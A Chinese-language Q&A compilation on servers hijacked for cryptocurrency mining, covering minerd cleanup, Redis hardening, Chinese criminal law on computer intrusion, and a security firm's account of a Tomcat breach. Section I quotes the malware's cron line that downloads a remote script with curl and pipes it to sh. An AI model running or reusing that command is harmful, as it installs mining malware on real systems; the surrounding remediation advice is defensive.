盗用服务器挖矿犯罪

Ⅰ 阿里云服务器被挖矿了怎么办(纯纯电脑小白

1. 关闭访问挖矿服务器的访问

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉执行权限， 在没有找到根源前，千万不要删除 minerd，因为删除了，过一回会自动有生成一个。

3. pkill minerd ,杀掉进程

4. service stop crond 或者 crontab -r 删除所有的执行计划

5. 执行top，查看了一会，没有再发现minerd 进程了。

6.检查/var/spool/cron/目录下发现有个root用户的定时器文件。

下载脚本的语句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件内容如下，感兴趣的可以研究下：

View Code

解决minerd并不是最终的目的，主要是要查找问题根源，我的服务器问题出在了redis服务了，黑客利用了redis的一个漏洞获得了服务器的访问权限，http://blog.jobbole.com/94518/然后就注入了病毒，下面是解决办法和清除工作：

1. 修复 redis 的后门,

配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379.
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中.
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”，区分普通用户和admin权限，普通用户将会被禁止运行某些命令，如conf
2. 打开 ~/.ssh/authorized_keys, 删除你不认识的账号

3. 查看你的用户列表，是不是有你不认识的用户添加进来。 如果有就删除掉.

Ⅱ 网吧偷挖矿判多久

网吧偷挖矿判三年有期徒刑。
虚拟货币不具有与法定货币等同的法律地位。
具体如下：
1、数量难以满足市场交易需要，比特币的程序设置了最高数量限制，成为它可以保值增值的理由，也正是因为如此注定难以发挥货币的功能和作用；
2、比特币钱包初次安装时会消耗大量时间下载历史交易数据块。比特币交易时，为了确认数据准确性消耗一些时间，与网络进行交互得到全网确认后，交易才算完成；
3、价格波动极大由于大量炒家介入，导致比特币兑换现金的价格如过山车一般起伏。
《中华人民共和国刑法》第二百八十五条 非法侵入计算机信息系统罪违反国家规定，侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的，处三年以下有期徒刑或者拘役。
非法获取计算机信息系统数据、非法控制计算机信息系统罪违反国家规定，侵入前款规定以外的计算机信息系统或者采用其他技术手段，获取该计算机信息系统中存储、处理或者传输的数据，或者对该计算机信息系统实施非法控制，情节严重的，处三年以下有期徒刑或者拘役，并处或者单处罚金；情节特别严重的，处三年以上七年以下有期徒刑，并处罚金。
提供侵入、非法控制计算机信息系统程序、工具罪提供专门用于侵入、非法控制计算机信息系统的程序、工具，或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具，情节严重的，依照前款的规定处罚。
单位犯前三款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照各该款的规定处罚。
第二百八十六条 破坏计算机信息系统罪违反国家规定，对计算机信息系统功能进行删除、修改、增加、干扰，造成计算机信息系统不能正常运行，后果严重的，处五年以下有期徒刑或者拘役；后果特别严重的，处五年以上有期徒刑。
违反国家规定，对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除、修改、增加的操作，后果严重的，依照前款的规定处罚。
故意制作、传播计算机病毒等破坏性程序，影响计算机系统正常运行，后果严重的，依照第一款的规定处罚。
单位犯前三款罪的，对单位判处罚金，并对其直接负责的主管人员和其他直接责任人员，依照第一款的规定处罚。

Ⅲ 被盗1450万！江西“比特币”盗窃案告破，嫌疑人将面临什么处罚

被盗1450万，江西比特币盗窃案告破，这件事情在网上引发了网友们的热议，我们都知道现在的时代是一个互联网时代，同时也是一个高速发展的时代，有非常多的人想着通过不法手段来赚取钱财，其实是非常的不值得提倡的，我们也希望每个人能够吸取这次教训，嫌疑人也将会面临非常严厉的处罚。

我们也希望通过这次的教训能够给每个人引发一个警醒，如果每个人都像他们这样的话，那么一定会面临牢狱之灾的同时，我们需要注意的是黑客技术再厉害依然还会留下非常多的热点的，终究是肉体凡胎，离不开法律的制裁，也希望他们能够吸取这次教训，在以后的生活中能够好好做人，一定不做违法乱纪的事，希望每个人都能够注意到这一点。

Ⅳ 服务器被下挖矿了怎么办

哥们被下了啥挖矿？去举报啊。之前流量矿石非常火的时候，我的服务器也被无良黑了，成了肉鸡，然后我去找到他的信息，截图跟流量矿石举报，就帮我处理了。你看你的被下了啥，就去找他们处理。

Ⅳ 做比特币挖矿机犯法吗

截止至2020年7月24日，国家还没发布任何的法律说明比特币挖矿机违法。

比特币挖矿机是获取比特币的方式之一。比特币（Bitcoin）是一种由开源的P2P软件产生的网络虚拟货币。

它不依靠特定货币机构发行，通过特定算法的大量计算产生，比特币经济使用整个P2P网络中众多节点构成的分布式数据库来确认并记录所有的交易行为。P2P的去中心化特性与算法本身可以确保无法通过大量制造比特币来人为操控币值 。

(5)盗用服务器挖矿犯罪扩展阅读

比特币的发行和交易的完成是通过挖矿来实现的， 它以一个确定的但不断减慢 的速率被铸造出来。每一个新区块都伴随着一定数量从无到有的全新比特币，它作为coinbase交易奖励给找到区块的矿工。

每个区块的奖励不是固定不变的 ，每开采210000个区块，大约耗时4年，货币发行速率降低50%。在比特币运行的第一个四年中，每个区块创造出50个新比特币。每个区块创造出12.5个新比特币。除了块奖励外，矿工还会得到区块内所有交易的手续费 。

参考资料来源：网络-比特币挖矿机

Ⅵ 矿石的行为是适用盗窃罪还是非法采矿罪

我是律师
盗窃罪是指刑法二百六十四条非法占有为目的，盗取公私财物数额巨大，
而非法采矿罪是刑法三百四十三条规定，非法采矿罪，是指违反矿产资源保护法的规定，未取得采矿许可证擅自采矿的，擅自进入国家规划矿区、对国民经济具有重要价值的矿区和他人矿区范围采矿的，擅自开采国家规定实行保护性开采的特定矿种，经责令停止开采后拒不停止开采，造成矿产资源破坏的行为。

Ⅶ 求助服务器被挖矿程序入侵，如何排查

新客户于最近向我们SINE安全公司咨询，说他的服务器经常卡的网站无法打开，远程连接

服务器的慢的要命，有时候PING值都达到300-500之间，还经常掉包，听客户这么一说，一般

会判断为受到了CC+DDOS混合流量攻击，再具体一问，说是机房那面没有受到流量攻击，这

就有点奇怪了，不是流量攻击，还导致服务器卡，网站无法打开，这是什么攻击？为了解决客

户服务器卡的问题，我们随即安排安全工程师对他的Linux服务器进行了安全检测与安全部署。

挖矿木马还设计了挖矿进程如果被客户强制停止后，会自动启动继续挖矿，达到不间断的挖矿，

仔细检查发现是通过设置了每个小时执行任务计划，远程下载shell挖矿木马，然后执行，检查

当前进程是否存在，不存在就启动挖矿木马，进行挖矿。

对客户的linux服务器进行详细了安全检测发现幸亏没有加密服务器的数据，以及感染蠕虫的病

毒，如果数据被加密那损失大了，客户是做平台的，里面的客户数据很重要，找出挖矿木马后，

客户需要知道服务器到底是如何被攻击的？ 被上传挖矿木马的？ 防止后期再出现这样的攻击

状况。

通过我们安全工程师的安全检测与分析，发现该服务器使用的是apache tomcat环境，平台的开

发架构是JSP+oracle数据库，apache tomcat使用的是2016年的版本，导致该apache存在严重

的远程执行命令漏洞，入侵者可以通过该漏洞直接入侵服务器，拿到服务器的管理员权限，

SINE安全工程师立即对apache 漏洞进行修复，并清除木马，至此问题得以解决，客户服务器

一切稳定运行，网站打开正常。

Ⅷ 偷挖矿在自己家粉碎犯法吗

盗矿是违法行为，数量大了，就会有人管你，真心在帮你期待采纳，